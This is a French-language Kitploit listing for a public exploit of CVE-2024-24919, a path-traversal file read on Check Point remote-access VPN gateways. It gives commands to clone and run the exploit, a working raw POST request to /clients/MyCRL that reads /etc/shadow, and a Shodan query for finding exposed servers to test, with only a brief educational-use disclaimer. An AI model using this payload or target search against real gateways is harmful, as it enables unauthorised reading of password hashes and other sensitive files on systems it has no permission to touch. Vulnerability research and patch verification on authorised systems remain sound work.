Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-24919-Exploit — CVE-2024-24919 Exploit et PoC - LFI critique pour VPN d'accès distant ou accès mobile. | Kitploit
Outils/GitHubGitHub/rug4lo/cve-2024-24919-exploit
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionApprentissage et Éducation
GitHubrug4lo/cve-2024-24919-exploit

CVE-2024-24919-Exploit

CVE-2024-24919 Exploit et PoC - LFI critique pour VPN d'accès distant ou accès mobile.

Voir le dépôt
3il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-24919-Exploit

Aperçu

Ce dépôt contient un exploit Python pour la CVE-2024-24919, une vulnérabilité qui permet de lire des fichiers sensibles depuis la page vulnérable.

Cet exploit vérifie d'abord si la cible est vulnérable, puis récupère le chemin que vous spécifiez.

Sévérité: Critique

Utilisation

Clonez d'abord le dépôt :

root@kitploit:~
git clone https://github.com/Rug4lo/CVE-2024-24919-Exploit
cd CVE-2024-24919-Exploit

Donnez les privilèges et exécutez l'exploit avec python3

root@kitploit:~
chmod +x exploit.py
python3 exploit.py

Suivez ensuite les étapes et vous obtiendrez les données du fichier spécifié.

Si vous rencontrez des difficultés, assurez-vous que l'URL que vous spécifiez est l'URL principale.

✓ https://google.com

✘ https://google.com/search?client=firefox

POC (Preuve de Concept)

Nous devons d'abord nous assurer que le site web possède des Check Point Security Gateways avec un accès VPN distant ou un logiciel d'accès mobile activé.

Dans cet exploit, nous pointons vers le point de terminaison {ip}/clients/MyCRL.

Ce point de terminaison est vulnérable si nous effectuons une requête POST, nous ajoutons la chaîne CSHELL/ et le chemin du fichier que nous voulons lire en utilisant un Path Traversal.

La requête ressemblera à ceci :

root@kitploit:~
POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow

Nous obtenons tout cela en regardant le code source.

Pour plus d'informations sur le processus, consultez cet article --> https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/

Test

Si vous souhaitez tester cette vulnérabilité, vous pouvez utiliser Sodan pour trouver des sites web vulnérables, en utilisant cette requête dans sodan

root@kitploit:~
Server: "Check Point SVN Foundation"

Références

https://nvd.nist.gov/vuln/detail/CVE-2024-24919 https://www.cronup.com/cve-2024-24919-zeroday-critico-explotado-activamente-en-vpns-check-point/ https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-24919

Avis de non-responsabilité

Ce script est uniquement à des fins éducatives. Utilisez-le de manière responsable et uniquement sur des systèmes pour lesquels vous avez l'autorisation d'accès.

Télécharger l’outil